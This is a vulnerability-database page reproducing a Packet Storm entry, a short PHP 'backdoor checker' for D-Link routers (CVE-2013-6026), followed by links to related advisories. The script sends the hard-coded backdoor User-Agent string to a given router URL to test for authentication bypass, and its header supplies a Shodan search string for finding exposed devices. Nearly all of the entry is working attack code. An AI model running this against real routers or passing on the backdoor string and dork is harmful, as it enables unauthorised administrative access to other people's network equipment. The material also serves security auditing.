Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDustyfreshPACKETSTORM:123848
HistoryOct 30, 2013 - 12:00 a.m.

D-Link Backdoor Czechr

2013-10-3000:00:00
dustyfresh
packetstormsecurity.com
34

0.028 Low

EPSS

Percentile

90.7%

JSON
`#!/usr/bin/php  
<?php  
/*  
.---------------------------------.  
| |  
| dlinkd - D-link backdoor czechr |  
| |  
.-------------------------------------------------------------------------------.  
| Written by @dustyfresh - 10/13 |  
.-------------------------------------------------------------------------------.  
| See: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/  
| http://www.security-database.com/detail.php?alert=CVE-2013-6026  
| Usage(command-line only):  
| ./dlinkd http://192.168.1.1:8080/  
| Shodan dork:  
| thttpd-alphanetworks/2.23  
.-------------------------------------------------------------------------------.  
| Educational purposes only, kkthnx. |  
| http://rootatx.com/ || http://staypimp.in/ |  
.-------------------------------------------------------------------------------.  
| GNU GENERAL PUBLIC LICENSE  
|  
| Version 3, 29 June 2007  
|  
| Copyright © 2007 Free Software Foundation, Inc. <http://fsf.org/>  
| Everyone is permitted to copy and distribute verbatim copies of this license  
| document, but changing it is not allowed.  
|  
| http://www.gnu.org/licenses/gpl.html  
.-------------------------------------------------------------------------------.  
*/  
error_reporting(1);  
set_time_limit(0); // ain't nobody got time fo' dat  
$help = "\t--help, this help menu\n\nexample: ./dlinkd http://192.168.1.1:8080\n";  
$host = $argv[1];  
$curl = curl_init($host);  
$swag = array(  
CURLOPT_HEADER => 'true',  
CURLOPT_POST => 'true',  
CURLOPT_USERAGENT => 'xmlset_roodkcableoj28840ybtide', // the secret ingredient  
CURLOPT_RETURNTRANSFER => 1  
);  
curl_setopt_array($curl,$swag);  
switch($argv[1]){  
case NULL:  
die($help);  
break;  
case "--help":  
die($help);  
break;  
}  
$sup = curl_exec($curl);  
$return = curl_getinfo($curl);  
curl_close($curl);  
$exit = $return['http_code'];  
if($exit != 200){  
print "[$host] :( This door is locked.\n";  
} else {  
print "THIS IS A TRIUMPH! [$host] is vulnerable\n";  
// 'murica, ah'll tell u whut  
}  
?>  
  
`

Related

openvas 1
cve 1
cvelist 1
nessus 1
nvd 1
prion 1
cert 1
openvas
openvas
D-Link Multiple Devices Backdoor
2013-10-14 00:00:00
cve
cve
CVE-2013-6026
2022-10-03 16:14:50
cvelist
cvelist
CVE-2013-6026
2022-10-03 16:14:50
nessus
nessus
alpha_auth_check() Function Remote Authentication Bypass
2013-10-15 00:00:00
nvd
nvd
CVE-2013-6026
2013-10-19 10:36:08
prion
prion
Authentication flaw
2013-10-19 10:36:00
cert
cert
D-Link routers authenticate administrative access using specific User-Agent string
2013-10-17 00:00:00

0.028 Low

EPSS

Percentile

90.7%

JSON
Related for PACKETSTORM:123848
openvas1cve1cvelist1nessus1nvd1prion1cert1